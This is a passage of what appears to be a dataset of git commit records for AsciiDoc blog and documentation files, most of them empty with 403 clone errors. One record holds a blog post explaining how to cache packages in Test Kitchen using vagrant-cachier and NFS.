'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5224eee4457693429a3329fad68321022d07c480","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cec7c7c0acdb4b8305397195c4b0cc161a0e4c6","subject":"Update 2016-02-20-Caching-in-Kitchen.adoc","message":"Update 2016-02-20-Caching-in-Kitchen.adoc","repos":"amberry\/blog,amberry\/blog,amberry\/blog,amberry\/blog","old_file":"_posts\/2016-02-20-Caching-in-Kitchen.adoc","new_file":"_posts\/2016-02-20-Caching-in-Kitchen.adoc","new_contents":"= Caching in Kitchen\nAdam Berry <adam.m.berry@gmail.com>\n:hp-tags: test-kitchen, chef, vagrant\n\nIf you spend time in the development cycle for chef-cookbooks with \nhttp:\/\/kitchen.ci\/[test-kitchen], I bet you've spent significant time waiting for packages to \ndownload. The straw that broke this particular camel's back was having vpn performance issues, \nwhich really motivated me to find a solution.\n\nA small search later, and I came across the a plugin for https:\/\/www.vagrantup.com\/[Vagrant] \ncalled http:\/\/fgrehm.viewdocs.io\/vagrant-cachier\/[vagrant-cachier], which fit the bill perfectly\nwith only having to figure out how to wire it in to the vagrant setup that kitchen creates.\n\nThe easiest way to wire this in is to use the support for adding in extra Vagrantfiles from the\nhttps:\/\/github.com\/test-kitchen\/kitchen-vagrant#-vagrantfiles[kitchen-vagrant] driver. With no\nfurther ado, the full list of things I did to get it working. All on OS X 10.11.3.\n\n== 1. Install the plugin\n\n`vagrant plugin install vagrant-cachier`\n\n== 2. Additional vagrant file\n\n[source,ruby]\n.VagrantPlugins.rb\n----\nVagrant.configure(\"2\") do |c|\n if Vagrant.has_plugin?(\"vagrant-cachier\")\n c.vm.provision \"shell\",\n inline: \"mkdir -p \/tmp\/kitchen\/cache; chown -R vagrant:vagrant \/tmp\/kitchen\"\n \tc.cache.scope = :box\n c.cache.synced_folder_opts = {\n type: :nfs,\n nfs_export: false\n }\n c.cache.enable :generic, {\n \"chef\" => { cache_dir: \"\/tmp\/kitchen\/cache\" },\n }\n end\nend\n----\n\nHere I used nfs because our base virtualbox image doesn't include the guest additions, and so\nthis is the fastest additional thing to include to get caching to work.\n\nYum and gem caching came for free, because \n\n== 3. Setup nfsd on host\n\nIf you are using nfs, as I did, edit `\/etc\/exports` to include a line for ip addresses that your\nkitchen boxes will use, something like\n\n----\n\/Users\/[uid]\/.vagrant.d\/cache\" 10.10.10.0\/16\n----\n\nThis covers the ip space we configure for kitchen instances, adjust yours accordingly. You\ndon't need to start\/stop a service or anything the os and vagrant take care of that.\n\n== 4. Edit `.kitchen.yml`\n\nFinal step is the extra changes that you need in the kitchen configuration to bring this all\ntogether.\n\n----\ndriver:\n name: vagrant\n provision: true\n network:\n - ['private_network', {ip: '10.10.10.99'}]\n vagrantfiles:\n - VagrantPlugins.rb\n----\n\nThis assumes you placed that file at the same level as the yaml.\n\n== 5. Profit\n\nThis caches at the box level, so anytime you use that box, it will use the same cache, greatly\nspeeding up subsequent runs.\n\n","old_contents":"","returncode":1,"stderr":"error: pathspec '_posts\/2016-02-20-Caching-in-Kitchen.adoc' did not match any file(s) known to git\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4ef2592b145bf675bab92b078c0d61e767a73a6","subject":"Update 2017-01-11-ZEIGEN-UBER-UMWEGE.adoc","message":"Update 2017-01-11-ZEIGEN-UBER-UMWEGE.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-11-ZEIGEN-UBER-UMWEGE.adoc","new_file":"_posts\/2017-01-11-ZEIGEN-UBER-UMWEGE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9e28c25ee8d9d409f5b77cf9734bb6914400766","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa5e5e7c186a80503c49d68dd7ae0bc5406bb2f4","subject":"y2b create post They Call It The Bass Egg...","message":"y2b create post They Call It The Bass Egg...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-13-They-Call-It-The-Bass-Egg.adoc","new_file":"_posts\/2017-07-13-They-Call-It-The-Bass-Egg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d15685971f85c00e564b02d5426ba8796a7e4b50","subject":"Publish 2016-6-28-PHPER-authority-control-RBAC.adoc","message":"Publish 2016-6-28-PHPER-authority-control-RBAC.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-28-PHPER-authority-control-RBAC.adoc","new_file":"2016-6-28-PHPER-authority-control-RBAC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4edbca0cabfb017460262a0ccd529597aa98a017","subject":"replaced \"@LoggedIn User\" with \"Identity identity\"","message":"replaced \"@LoggedIn User\" with \"Identity identity\"\n\n@LoggedIn is not a real annotation, so the code examples can't be copy\/pasted and used.\r\nIt appears it can be this can be replaced with injecting an Identity type instead.\r\n\r\nDELTASPIKE-860\n","repos":"chkal\/deltaspike,struberg\/deltaspike,idontgotit\/deltaspike,idontgotit\/deltaspike,Danny02\/deltaspike,danielsoro\/deltaspike,mlachat\/deltaspike,rdicroce\/deltaspike,chkal\/deltaspike,struberg\/deltaspike,rdicroce\/deltaspike,Danny02\/deltaspike,rdicroce\/deltaspike,struberg\/deltaspike,os890\/DS_Discuss,os890\/deltaspike-vote,subaochen\/deltaspike,apache\/deltaspike,mlachat\/deltaspike,chkal\/deltaspike,os890\/DS_Discuss,subaochen\/deltaspike,idontgotit\/deltaspike,subaochen\/deltaspike,danielsoro\/deltaspike,idontgotit\/deltaspike,rdicroce\/deltaspike,apache\/deltaspike,Danny02\/deltaspike,os890\/DS_Discuss,danielsoro\/deltaspike,os890\/DS_Discuss,subaochen\/deltaspike,mlachat\/deltaspike,chkal\/deltaspike,Danny02\/deltaspike,apache\/deltaspike,os890\/deltaspike-vote,mlachat\/deltaspike,os890\/deltaspike-vote,danielsoro\/deltaspike,apache\/deltaspike,os890\/deltaspike-vote,struberg\/deltaspike","old_file":"documentation\/src\/main\/asciidoc\/security.adoc","new_file":"documentation\/src\/main\/asciidoc\/security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Danny02\/deltaspike.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e008b9ea8c3adfa61c8e6d78865f4ac9c43b490","subject":"y2b create post Unboxing The World's Smallest 4G Smartphone","message":"y2b create post Unboxing The World's Smallest 4G Smartphone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-28-Unboxing-The-Worlds-Smallest-4G-Smartphone.adoc","new_file":"_posts\/2017-04-28-Unboxing-The-Worlds-Smallest-4G-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4a4ecc5efd9e20281fad26f9271ea74d68a1254","subject":"Update 2017-09-24-Backdoor-CTF-2017-Crypto.adoc","message":"Update 2017-09-24-Backdoor-CTF-2017-Crypto.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-24-Backdoor-CTF-2017-Crypto.adoc","new_file":"_posts\/2017-09-24-Backdoor-CTF-2017-Crypto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04042da1054cd2c426a9062b70f1f691c42294f3","subject":"Update 2019-02-22-docker-selenium-with-php.adoc","message":"Update 2019-02-22-docker-selenium-with-php.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-22-docker-selenium-with-php.adoc","new_file":"_posts\/2019-02-22-docker-selenium-with-php.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f000c30931e9ba57964e0f66a3ab6ccb2241e561","subject":"Add note about Groovy upgrade to upgrade guide","message":"Add note about Groovy upgrade to upgrade guide\n","repos":"blindpirate\/gradle,robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,gradle\/gradle,robinverduijn\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,robinverduijn\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,robinverduijn\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/upgrading_version_5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gradle\/gradle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0d2201c0182e0545fbc516abc4869c4d7defe3e3","subject":"adding a workshop abstract","message":"adding a workshop abstract\n","repos":"arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"resources\/abstract.adoc","new_file":"resources\/abstract.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c3c26d70cbb220f187647d05e92689bffa8c769d","subject":":memo: fetch","message":":memo: fetch\n","repos":"syon\/refills","old_file":"src\/refills\/javascript\/fetch.adoc","new_file":"src\/refills\/javascript\/fetch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7dbf4abd330666aff26fa89db990a4f6b5b74d3b","subject":":memo: vuex","message":":memo: vuex\n","repos":"syon\/refills","old_file":"src\/refills\/vuejs\/vuex.adoc","new_file":"src\/refills\/vuejs\/vuex.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39ecdabb4766467fe33621c697a440180d6ad30e","subject":"Update 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","message":"Update 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_file":"_posts\/04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93c2d419409367b0c50fc02fd7b3aa8c94ceda0a","subject":"Update 2018-01-06-Onion-Omega-Temperatursensor.adoc","message":"Update 2018-01-06-Onion-Omega-Temperatursensor.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2018-01-06-Onion-Omega-Temperatursensor.adoc","new_file":"_posts\/2018-01-06-Onion-Omega-Temperatursensor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a92370fcc9f6d79b3e043188233b527bbb30d06","subject":"Convert Latex to AsciiDoc using with the following command","message":"Convert Latex to AsciiDoc using with the following command\n\n$ pandoc -f latex -t asciidoc -o umaka-score.adoc umaka-score.tex\n","repos":"dbcls\/umakadata,dbcls\/umakadata,dbcls\/umakadata,dbcls\/umakadata,level-five\/umakadata-1,level-five\/umakadata-1,level-five\/umakadata-1,level-five\/umakadata-1","old_file":"web\/docs\/umaka-score\/umaka-score.adoc","new_file":"web\/docs\/umaka-score\/umaka-score.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dbcls\/umakadata.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9332b0b4b630370f155c6347ea5a4759152d22c","subject":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","message":"Update 2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_file":"_posts\/2015-09-29-Web-Platform-Daily-September-2015-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19acc64763e9a1deea452307307a0bf97307ae79","subject":"Update 2017-09-21-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","message":"Update 2017-09-21-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-09-21-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","new_file":"_posts\/2017-09-21-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"714adc535a489c504183ec18aaf7c3547b14f662","subject":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-25-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-25-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf519d947194222a8575ae6231b61efb85f8419a","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36e9a650f407c702759baea21439433ffcd9abe4","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"083ff01b6d9fe17baf4913855117ee76286f116e","subject":"Update 2015-12-23-Python-Method-Resolution-Order.adoc","message":"Update 2015-12-23-Python-Method-Resolution-Order.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-23-Python-Method-Resolution-Order.adoc","new_file":"_posts\/2015-12-23-Python-Method-Resolution-Order.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60cc1ac1469d7954ae9252f6933b229af0771d5d","subject":"Update 2016-03-24-2016-Dates-announced-for-Mickeys-Not-So-Scary-Halloween-Party-and-Mickeys-Very-Merry-Christmas-Party.adoc","message":"Update 2016-03-24-2016-Dates-announced-for-Mickeys-Not-So-Scary-Halloween-Party-and-Mickeys-Very-Merry-Christmas-Party.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-24-2016-Dates-announced-for-Mickeys-Not-So-Scary-Halloween-Party-and-Mickeys-Very-Merry-Christmas-Party.adoc","new_file":"_posts\/2016-03-24-2016-Dates-announced-for-Mickeys-Not-So-Scary-Halloween-Party-and-Mickeys-Very-Merry-Christmas-Party.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e68960d54604b374f1cb84b842344f42a0198908","subject":"Added String dataformat docs to Gitbook","message":"Added String dataformat docs to Gitbook\n","repos":"RohanHart\/camel,gnodet\/camel,bgaudaen\/camel,neoramon\/camel,ullgren\/camel,akhettar\/camel,bgaudaen\/camel,NickCis\/camel,w4tson\/camel,chirino\/camel,chirino\/camel,NickCis\/camel,pkletsko\/camel,dmvolod\/camel,nicolaferraro\/camel,dmvolod\/camel,zregvart\/camel,ssharma\/camel,curso007\/camel,sabre1041\/camel,JYBESSON\/camel,snurmine\/camel,CodeSmell\/camel,JYBESSON\/camel,scranton\/camel,cunningt\/camel,tlehoux\/camel,dmvolod\/camel,tkopczynski\/camel,pmoerenhout\/camel,nicolaferraro\/camel,gnodet\/camel,snurmine\/camel,objectiser\/camel,jkorab\/camel,nboukhed\/camel,scranton\/camel,sirlatrom\/camel,yuruki\/camel,sverkera\/camel,sirlatrom\/camel,dmvolod\/camel,Fabryprog\/camel,lburgazzoli\/camel,DariusX\/camel,tkopczynski\/camel,tadayosi\/camel,Fabryprog\/camel,sabre1041\/camel,scranton\/camel,lburgazzoli\/apache-camel,pmoerenhout\/camel,jonmcewen\/camel,tkopczynski\/camel,driseley\/camel,hqstevenson\/camel,tadayosi\/camel,Thopap\/camel,onders86\/camel,veithen\/camel,neoramon\/camel,sverkera\/camel,driseley\/camel,snurmine\/camel,Thopap\/camel,sverkera\/camel,mcollovati\/camel,mcollovati\/camel,rmarting\/camel,acartapanis\/camel,ssharma\/camel,hqstevenson\/camel,jamesnetherton\/camel,ullgren\/camel,scranton\/camel,veithen\/camel,punkhorn\/camel-upstream,lburgazzoli\/apache-camel,hqstevenson\/camel,DariusX\/camel,christophd\/camel,prashant2402\/camel,bhaveshdt\/camel,tdiesler\/camel,lburgazzoli\/camel,alvinkwekel\/camel,kevinearls\/camel,davidkarlsen\/camel,acartapanis\/camel,RohanHart\/camel,RohanHart\/camel,lburgazzoli\/camel,jkorab\/camel,pmoerenhout\/camel,allancth\/camel,ssharma\/camel,alvinkwekel\/camel,yuruki\/camel,tlehoux\/camel,dmvolod\/camel,adessaigne\/camel,nicolaferraro\/camel,cunningt\/camel,mgyongyosi\/camel,isavin\/camel,sverkera\/camel,adessaigne\/camel,mcollovati\/camel,gautric\/camel,NickCis\/camel,curso007\/camel,gautric\/camel,mgyongyosi\/camel,allancth\/camel,kevinearls\/camel,bgaudaen\/camel,anoordover\/camel,christophd\/camel,snurmine\/camel,cunningt\/camel,jamesnetherton\/camel,allancth\/camel,prashant2402\/camel,acartapanis\/camel,christophd\/camel,NickCis\/camel,ssharma\/camel,chirino\/camel,curso007\/camel,mgyongyosi\/camel,anton-k11\/camel,Thopap\/camel,yuruki\/camel,nboukhed\/camel,sabre1041\/camel,jarst\/camel,zregvart\/camel,nboukhed\/camel,anoordover\/camel,prashant2402\/camel,yuruki\/camel,akhettar\/camel,gilfernandes\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,NickCis\/camel,isavin\/camel,anoordover\/camel,pkletsko\/camel,gautric\/camel,rmarting\/camel,jarst\/camel,apache\/camel,pax95\/camel,ullgren\/camel,chirino\/camel,pkletsko\/camel,veithen\/camel,sirlatrom\/camel,bgaudaen\/camel,kevinearls\/camel,gilfernandes\/camel,isavin\/camel,drsquidop\/camel,sabre1041\/camel,alvinkwekel\/camel,jkorab\/camel,tadayosi\/camel,bgaudaen\/camel,pax95\/camel,jkorab\/camel,lburgazzoli\/apache-camel,isavin\/camel,driseley\/camel,pmoerenhout\/camel,w4tson\/camel,lburgazzoli\/apache-camel,Fabryprog\/camel,pmoerenhout\/camel,apache\/camel,Thopap\/camel,bgaudaen\/camel,ssharma\/camel,allancth\/camel,gnodet\/camel,curso007\/camel,anton-k11\/camel,isavin\/camel,JYBESSON\/camel,acartapanis\/camel,tdiesler\/camel,akhettar\/camel,pkletsko\/camel,tlehoux\/camel,driseley\/camel,cunningt\/camel,veithen\/camel,onders86\/camel,jonmcewen\/camel,kevinearls\/camel,apache\/camel,lburgazzoli\/camel,bhaveshdt\/camel,alvinkwekel\/camel,neoramon\/camel,objectiser\/camel,gautric\/camel,kevinearls\/camel,lburgazzoli\/apache-camel,apache\/camel,drsquidop\/camel,apache\/camel,tdiesler\/camel,jonmcewen\/camel,acartapanis\/camel,gilfernandes\/camel,kevinearls\/camel,prashant2402\/camel,sverkera\/camel,bhaveshdt\/camel,rmarting\/camel,yuruki\/camel,onders86\/camel,CodeSmell\/camel,tlehoux\/camel,salikjan\/camel,pax95\/camel,w4tson\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,drsquidop\/camel,anton-k11\/camel,ssharma\/camel,mcollovati\/camel,curso007\/camel,lburgazzoli\/apache-camel,bhaveshdt\/camel,anoordover\/camel,snurmine\/camel,drsquidop\/camel,punkhorn\/camel-upstream,sirlatrom\/camel,rmarting\/camel,tlehoux\/camel,Thopap\/camel,rmarting\/camel,zregvart\/camel,veithen\/camel,JYBESSON\/camel,sirlatrom\/camel,scranton\/camel,cunningt\/camel,apache\/camel,jarst\/camel,drsquidop\/camel,lburgazzoli\/camel,jamesnetherton\/camel,hqstevenson\/camel,Fabryprog\/camel,akhettar\/camel,nboukhed\/camel,sabre1041\/camel,JYBESSON\/camel,neoramon\/camel,isavin\/camel,prashant2402\/camel,gilfernandes\/camel,nikhilvibhav\/camel,anoordover\/camel,acartapanis\/camel,sirlatrom\/camel,nikhilvibhav\/camel,hqstevenson\/camel,jamesnetherton\/camel,tkopczynski\/camel,jamesnetherton\/camel,w4tson\/camel,jkorab\/camel,chirino\/camel,mgyongyosi\/camel,nboukhed\/camel,jonmcewen\/camel,neoramon\/camel,gnodet\/camel,mgyongyosi\/camel,DariusX\/camel,tdiesler\/camel,pax95\/camel,adessaigne\/camel,CodeSmell\/camel,tdiesler\/camel,neoramon\/camel,akhettar\/camel,DariusX\/camel,gautric\/camel,anton-k11\/camel,nikhilvibhav\/camel,gilfernandes\/camel,adessaigne\/camel,tadayosi\/camel,pmoerenhout\/camel,jamesnetherton\/camel,anton-k11\/camel,w4tson\/camel,objectiser\/camel,allancth\/camel,jarst\/camel,prashant2402\/camel,pax95\/camel,sverkera\/camel,jarst\/camel,nicolaferraro\/camel,RohanHart\/camel,cunningt\/camel,gnodet\/camel,davidkarlsen\/camel,allancth\/camel,ullgren\/camel,salikjan\/camel,yuruki\/camel,nboukhed\/camel,onders86\/camel,drsquidop\/camel,anton-k11\/camel,jonmcewen\/camel,christophd\/camel,zregvart\/camel,chirino\/camel,tkopczynski\/camel,pax95\/camel,tkopczynski\/camel,pkletsko\/camel,tdiesler\/camel,davidkarlsen\/camel,pkletsko\/camel,onders86\/camel,jarst\/camel,nikhilvibhav\/camel,RohanHart\/camel,w4tson\/camel,veithen\/camel,akhettar\/camel,scranton\/camel,jkorab\/camel,rmarting\/camel,JYBESSON\/camel,driseley\/camel,adessaigne\/camel,curso007\/camel,snurmine\/camel,bhaveshdt\/camel,driseley\/camel,bhaveshdt\/camel,christophd\/camel,mgyongyosi\/camel,gautric\/camel,objectiser\/camel,tadayosi\/camel,onders86\/camel,dmvolod\/camel,sabre1041\/camel,hqstevenson\/camel,jonmcewen\/camel,christophd\/camel,tlehoux\/camel,gilfernandes\/camel,tadayosi\/camel,lburgazzoli\/camel,adessaigne\/camel,NickCis\/camel,anoordover\/camel,Thopap\/camel,RohanHart\/camel","old_file":"camel-core\/src\/main\/docs\/string-dataformat.adoc","new_file":"camel-core\/src\/main\/docs\/string-dataformat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"957f4bafc082942b168bf428751d010beeb27f18","subject":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af92e9a4ce3db38a55ffd6b63b23b2cc19e2e69c","subject":"y2b create post Nissan GTR 2012 Joyride (Nissan GTR Review)","message":"y2b create post Nissan GTR 2012 Joyride (Nissan GTR Review)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-05-02-Nissan-GTR-2012-Joyride-Nissan-GTR-Review.adoc","new_file":"_posts\/2012-05-02-Nissan-GTR-2012-Joyride-Nissan-GTR-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bcff7419e1814b9136acf403767a302b6ce85c2","subject":"Update 2016-01-12-Testing-blogging-with-Syntax-Highlighting.adoc","message":"Update 